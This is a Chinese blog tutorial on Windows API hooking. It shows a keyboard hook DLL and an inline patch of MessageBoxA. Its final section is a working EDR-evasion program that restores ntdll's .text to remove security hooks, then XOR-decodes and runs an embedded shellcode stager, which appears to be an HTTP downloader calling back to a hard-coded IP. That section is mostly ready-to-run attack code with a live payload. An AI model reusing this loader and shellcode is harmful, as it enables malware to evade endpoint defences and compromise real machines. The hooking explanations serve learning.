Windows API hook技术

Windows API hook技术

A.什么叫挂钩?

钩子技术即指“给特定的函数挂上钩子,让函数在执行前先执行被挂的钩子”,从而达到拦截事件和函数调用的目的。挂钩子的本质是一个程序段。

为了方便理解,我们首先实现一个简单的 keyboard 挂钩

hookDLL.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <string>
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    /// DLL entry point. No per-attach/detach work is done here: every loader
    /// notification (process/thread attach and detach) is ignored and
    /// initialization always reports success.
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
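/// Hook procedure for the WH_KEYBOARD_LL hook installed by the accompanying
/// hookexe. Writes a fixed marker file and passes the event on to the next hook.
/// @param code   hook code; the marker is written for every invocation, including
///               code < 0, which the hook contract says should only be passed through
/// @param wParam message identifier (WM_KEYDOWN etc.), forwarded unchanged
/// @param lParam pointer to the event data, forwarded unchanged
/// @return the value of CallNextHookEx, so the key event reaches the next hook
/// NOTE(review): hookexe resolves this symbol with GetProcAddress("KeyboardProc"),
/// which requires an unmangled export of that name — the export is not shown here.
/// NOTE(review): file I/O inside a low-level hook callback is slow; Windows can
/// silently uninstall a WH_KEYBOARD_LL hook whose callback exceeds its timeout.
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) {
    // The stray duplicate signature that preceded this definition lacked a
    // semicolon (a compile error); it is kept above as a proper prototype.
    // The file is opened in the default (truncating) mode, so each key event
    // rewrites the same fixed marker rather than appending to a log.
    ofstream text;
    text.open("c:\\programdata\\hook.txt");
    text << "HOOK";
    text.close();
    return CallNextHookEx(NULL, code, wParam, lParam);
}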

  hookexe.cpp

// installhook.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>

#include <windows.h>
#include <strsafe.h>

int main()
{
    // Loads the hook DLL from a hard-coded absolute path and installs its
    // KeyboardProc as a low-level keyboard hook (WH_KEYBOARD_LL).
    // None of the three results (hookdll, keybords, hhook) is checked, so a
    // failed LoadLibrary or GetProcAddress passes NULL straight into
    // SetWindowsHookEx. The hook is never removed with UnhookWindowsHookEx.
    HOOKPROC keybords;
    static HINSTANCE hookdll;
    hookdll = LoadLibrary(TEXT("C:\\Users\\localhost\\Desktop\\hook\\keyboradProcHook\\x64\\Release\\keyboradProcHook.dll"));
    // Lookup by name: requires the DLL to export an unmangled "KeyboardProc".
    keybords = (HOOKPROC)GetProcAddress(hookdll, "KeyboardProc");
    static HHOOK hhook;
    hhook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keybords,
        hookdll,
        0);   // dwThreadId 0: hook is associated with all threads on the desktop
    std::cout << "Hello World!\n";
    
}

B. 通过 HookedMessageBox 进一步了解 hook 技术

这里的源代码来自 https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++

#include "pch.h"
#include <iostream>
#include <Windows.h>

FARPROC messageBoxAddress = NULL;        // resolved address of user32!MessageBoxA, set in main()
SIZE_T bytesWritten = 0;                 // out-parameter shared by both WriteProcessMemory calls
char messageBoxOriginalBytes[6] = {};    // first 6 bytes of MessageBoxA, saved in main() for unpatching

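/// Replacement for MessageBoxA installed by main(): logs the intercepted
/// arguments, restores the saved prologue bytes so the real function is
/// runnable again, and forwards the call.
/// @param hWnd      owner window handle, forwarded unchanged
/// @param lpText    message body; MessageBoxA accepts NULL, so it is guarded here
/// @param lpCaption title; may also be NULL
/// @param uType     MessageBoxA style flags, forwarded unchanged
/// @return whatever the original MessageBoxA returns
int __stdcall HookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {

	// print intercepted values from the MessageBoxA function. Streaming a null
	// char* into std::cout is undefined behaviour, so substitute a marker.
	std::cout << "Ohai from the hooked function\n";
	std::cout << "Text: " << (lpText ? lpText : "(null)")
	          << "\nCaption: " << (lpCaption ? lpCaption : "(null)") << std::endl;

	// unpatch MessageBoxA: put the saved prologue back before calling into it.
	// This is a one-shot hook — the patch is not re-applied afterwards.
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, messageBoxOriginalBytes, sizeof(messageBoxOriginalBytes), &bytesWritten);

	// call the original MessageBoxA, keeping the caller's owner window rather
	// than dropping it (the original demo passed NULL here).
	return MessageBoxA(hWnd, lpText, lpCaption, uType);
}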

/// Demo entry point: shows MessageBoxA once unhooked, overwrites its first
/// 6 bytes in this process with a jump to HookedMessageBox, then calls it again.
int main()
{
	// show messagebox before hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	// library is never released with FreeLibrary, and neither it nor
	// messageBoxAddress is checked for NULL before use.
	HINSTANCE library = LoadLibraryA("user32.dll");
	SIZE_T bytesRead = 0;

	// get address of the MessageBox function in memory
	messageBoxAddress = GetProcAddress(library, "MessageBoxA");

	// save the first 6 bytes of the original MessageBoxA function - will need for unhooking
	// (6 matches sizeof(messageBoxOriginalBytes), the same length written back later)
	ReadProcessMemory(GetCurrentProcess(), messageBoxAddress, messageBoxOriginalBytes, 6, &bytesRead);

	// create a patch "push <address of new MessageBoxA); ret"
	// NOTE(review): only 4 bytes of the function pointer are copied, so this
	// push imm32 / ret encoding only fits a 32-bit build; on a 64-bit build
	// sizeof(void*) is 8 and the upper half of the address is silently lost.
	void* hookedMessageBoxAddress = &HookedMessageBox;
	char patch[6] = { 0 };
	memcpy_s(patch, 1, "\x68", 1);
	memcpy_s(patch + 1, 4, &hookedMessageBoxAddress, 4);
	memcpy_s(patch + 5, 1, "\xC3", 1);

	// patch the MessageBoxA (in-process write; the result is not checked)
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, patch, sizeof(patch), &bytesWritten);

	// show messagebox after hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	return 0;
}

通过 disam 反汇编发现,确实在第二次调用 MessageBoxA 的时候执行了我们的函数

Windows API hook技术

 

 

 

我们尝试分析hook过程

MessageBoxA 函数位于用户层的 user32.dll 中,所以我们先从 user32.dll 中找到 MessageBoxA 的地址

Windows API hook技术

 

 

然后读取当前进程内存中 MessageBoxA 地址处的前 6 个字节,留作后面 unhook 的时候使用

Windows API hook技术

 

 

然后就是构造用来修改自身内存的指令:

push ret

Windows API hook技术

 

 

 然后就是修改内存空间,

Windows API hook技术

 

 

这是修改后的 MessageBoxA

 

 

 Windows API hook技术

 

 

 进入HookedMessageBox后

 

 

 

 Windows API hook技术

 

 

C. 通过杀软特性实战 bypass EDR

一般来说 ntdll 是用户层与内核层之间的最后一道关口,很多杀软在进行拦截时都是 hook ntdll 里面的一些函数;这里讨论的是如何 bypass 它

一幅图简单明了

Windows API hook技术

 

 

前提是 ntdll 已经被 hook 了,当然如果没被 hook 最好 (:

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
#include <stdio.h>
/* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4
e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
unsigned char buf[] = "\xfd\xe9\x88\x1\x1\x1\x61\x88\xe4\x30\xd3\x65\x8a\x53\x31\x8a\x53\xd\x8a\x53\x15\x8a\x73\x29\xe\xb6\x4b\x27\x30\xfe\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\xc0\xce\xc\x0\xc6\xe3\xf1\x53\x56\x8a\x53\x11\x8a\x43\x3d\x0\xd1\x8a\x41\x79\x84\xc1\x75\x4b\x0\xd1\x51\x8a\x49\x19\x8a\x59\x21\x0\xd2\xe2\x3d\x48\x8a\x35\x8a\x0\xd7\x30\xfe\x30\xc1\xad\xc0\xce\xc\x0\xc6\x39\xe1\x74\xf5\x2\x7c\xf9\x3a\x7c\x25\x74\xe3\x59\x8a\x59\x25\x0\xd2\x67\x8a\xd\x4a\x8a\x59\x1d\x0\xd2\x8a\x5\x8a\x0\xd1\x88\x45\x25\x25\x5a\x5a\x60\x58\x5b\x50\xfe\xe1\x59\x5e\x5b\x8a\x13\xea\x87\x5c\x69\x6f\x64\x75\x1\x69\x76\x68\x6f\x68\x55\x69\x4d\x76\x27\x6\xfe\xd4\x30\xfe\x56\x56\x56\x56\x56\x69\x3b\x57\x78\xa6\xfe\xd4\xe8\x85\x1\x1\x1\x5a\x30\xc8\x50\x50\x6b\x2\x50\x50\x69\x51\x1\x1\x1\x52\x51\x69\x56\x88\x9e\xc7\xfe\xd4\xea\x71\x5a\x30\xd3\x53\x69\x1\x3\x41\x85\x53\x53\x53\x52\x53\x51\x69\xea\x54\x2f\x3a\xfe\xd4\x88\xc7\x82\xc2\x51\x30\xfe\x56\x56\x6b\xfe\x52\x57\x69\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x85\xc2\x0\x1\x1\x30\xfe\x84\xf7\x75\x5\x88\xf8\xea\x8\x69\xab\xc4\xe3\x5c\xfe\xd4\x88\xc0\x69\x44\x20\x5f\x30\xfe\xd4\x30\xfe\x56\x6b\x6\x50\x57\x51\x69\xb6\x56\xe1\xa\xfe\xd4\xbe\x1\x2e\x1\x1\x38\xc6\x75\xb6\x30\xfe\xe8\x90\x0\x1\x1\xe8\xc8\x0\x1\x1\xe9\x8a\xfe\xfe\xfe\x2e\x65\x42\x51\x64\x1\xb2\x9c\xe6\x19\xb4\x91\xc2\xb5\xcd\x2e\x69\xe0\x59\xff\x31\x34\x41\x11\x33\x29\xbf\x57\x97\x5\x33\x45\x36\xdd\x84\x9a\xb5\x58\xc0\xbb\xcf\xfb\x14\xd9\x12\xe2\x17\x95\xfc\x6b\xe1\x81\xc1\xc9\x10\xbe\x80\x91\x67\xe7\xea\xa7\x4e\x94\x8\xb5\x6c\x27\x18\x68\xcb\xc0\xe9\x7d\x89\xf4\x3e\xda\x39\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x34\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x38\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x56\x4e\x56\x37\x35\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x34\x2f\x31\x3a\x21\x43\x4e\x48\x44\x38\x3a\x44\x4f\x54\x52\x28\xc\xb\x1\x27\xa5\xe\x77\x5d\xbf\xd5\x23\x
da\x5c\xbe\xb1\x4\x19\xd1\x95\x42\xc6\xcf\x5e\x81\x95\x69\xb4\x46\xc3\xde\x28\xe4\x2d\x72\xb7\xfa\x85\x7c\x41\xdc\xac\xe\xc3\x71\x9b\x6f\xa5\xde\x65\x2e\xa0\x34\xfb\xca\x53\xb0\x87\x81\x8a\x52\x64\xff\x77\x9a\x1c\xf2\x34\xf4\xe9\xfd\xf3\xda\x9a\xf2\x8\x3d\x6f\x24\xd1\x5b\x2d\x9a\xe2\xf3\xb\x5b\xe5\x0\xad\xbd\x3a\x8a\xbc\x28\x5f\xf0\x4c\xf2\x13\xc\x4f\x3b\xaa\x2e\x1d\x97\x4\x78\x39\x1e\x7f\x96\x9\x14\xe4\x14\xfc\x25\x0\x32\x4c\x4e\x38\x22\x9\x45\xcf\x92\x28\x9a\xa4\xef\x25\xb6\xe8\x2d\x8c\xa9\xd3\xa6\x2d\x88\x85\xb\xd4\xca\xcd\x26\xb\x34\xaf\x5d\x47\xe1\xbb\x52\x2f\x82\xfc\xdb\xfd\xfd\xa9\xd6\xda\x71\x9f\xdf\xab\xec\x60\x6b\x7b\xd4\xde\xf4\x7\x9e\xf4\x2e\x10\x56\x6f\xa6\x62\x2f\x36\x52\x31\x97\xd4\xca\xbb\x61\x84\x26\x64\x2d\x78\xa2\x36\x4e\xae\x66\x14\xe\x90\xab\x7b\x1\x69\xf1\xb4\xa3\x57\xfe\xd4\x6b\x41\x69\x1\x11\x1\x1\x69\x1\x1\x41\x1\x56\x69\x59\xa5\x52\xe4\xfe\xd4\x92\xb8\x1\x1\x1\x1\x0\xd8\x50\x52\x88\xe6\x56\x69\x1\x21\x1\x1\x52\x57\x69\x13\x97\x88\xe3\xfe\xd4\x84\xc1\x75\xc7\x8a\x6\x0\xc2\x84\xc1\x74\xe4\x59\xc2\xe9\xa8\xfc\xfe\xfe\x30\x38\x33\x2f\x30\x37\x39\x2f\x30\x2f\x30\x31\x35\x1\x13\x35\x57\x79";
/// Replaces the in-memory .text section of the already-loaded ntdll.dll with
/// the .text section of a fresh SEC_IMAGE mapping of the on-disk file, which
/// discards any inline patches a user-mode security product placed there.
/// NOTE(review): from a detection standpoint this routine is itself a signal —
/// a SEC_IMAGE mapping of ntdll, a VirtualProtect to PAGE_EXECUTE_READWRITE
/// over ntdll's .text and a memcpy into it are all observable, and kernel-side
/// telemetry (ETW, kernel callbacks) does not depend on user-mode hooks.
void unhook() {
	HANDLE process = GetCurrentProcess();   // pseudo-handle: the CloseHandle on it below has no effect
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");

	GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
	// Clean copy: the on-disk file is mapped as an image so the same section
	// RVA can be used on both sides below. None of these three results is
	// checked; a NULL ntdllMappingAddress is dereferenced by the memcpy in the loop.
	HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	// Walk the section table of the loaded (possibly hooked) module.
	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		// Only .text is restored; other sections are left as loaded.
		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			// Both VirtualProtect results land in isProtected but are never examined.
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	// Cleanup is incomplete: the view from MapViewOfFile is never unmapped
	// (no UnmapViewOfFile), and FreeLibrary is applied to a handle obtained
	// from GetModuleHandleA, which did not take a reference on the module.
	CloseHandle(process);
	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);

}
/// Demo entry point: restores ntdll's .text, XOR-decodes `buf` into a stack
/// buffer, copies it into an RWX allocation and runs it as a thread-pool wait
/// callback on an already-signalled event.
/// NOTE(review): each step here is observable — an RWX VirtualAlloc, a
/// thread-pool callback whose address lies outside any loaded image, and
/// ntdll's .text being rewritten (twice) — which is what memory scanners and
/// callback-origin checks key on.
int main()
{
	unhook();
		int password = 1025;
	unsigned char deShellCode[1000];
	int nLen = sizeof(buf) - 1;   // not checked against sizeof(deShellCode)
		for (int i = 0; i < nLen; i++)
	{
		deShellCode[i] = buf[i] ^ password;
		printf("\\x%x", deShellCode[i]);   // echoes every decoded byte to stdout
	}

	// Auto-reset event created already signalled (bInitialState TRUE).
	HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
	// sizeof(deShellCode) is the whole 1000-byte buffer, so the uninitialized
	// tail past nLen is allocated and copied as well.
	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(deShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	unhook();   // second call; unhook() already ran at the top of main
	RtlMoveMemory(shellcodeAddress, deShellCode, sizeof(deShellCode));

	PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
	SetThreadpoolWait(threadPoolWait, event, NULL);
	WaitForSingleObject(event, INFINITE);

	// event, threadPoolWait and the VirtualAlloc'd region are never released
	// (no CloseHandle / CloseThreadpoolWait / VirtualFree).
	return 0;
}
//#include <stdio.h>
//#include <Windows.h>
//
///* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4
e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
//
//
//int main(int argc, char* argv[])
//{
//	int password = 1025;
//	unsigned char enShellCode[1000];
//	unsigned char deShellCode[1000];
//	int nLen = sizeof(buf) - 1;
//
//	for (int i = 0; i < nLen; i++)
//	{
//		enShellCode[i] = buf[i] ^ password;
//		printf("\\x%x", enShellCode[i]);
//	}
//
//	printf("\n");
//
//	/*for (int i = 0; i < nLen; i++)
//	{
//		deShellCode[i] = enShellCode[i] ^ password;
//		printf("\\x%x", deShellCode[i]);
//	}*/
//
//	system("pause");
//	return 0;
//}

D. 总结

当然,这次只是提到了一种 unhook 的手法,还有很多种,比如 https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher 以及 ACG: https://www.countercraftsec.com/blog/post/arbitrary-vs-kernel/

也可以直接调用 syscall,不经过被 hook 的 API;当然这些都是玩烂了的手法,只是体力活而已

参考

https://xz.aliyun.com/t/9166#toc-5
https://www.cnblogs.com/LyShark/p/13033722.html
https://improsec.com/tech-blog/user-mode-api-hooks-and-bypasses
https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/acg-arbitrary-code-guard-processdynamiccodepolicy
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

 
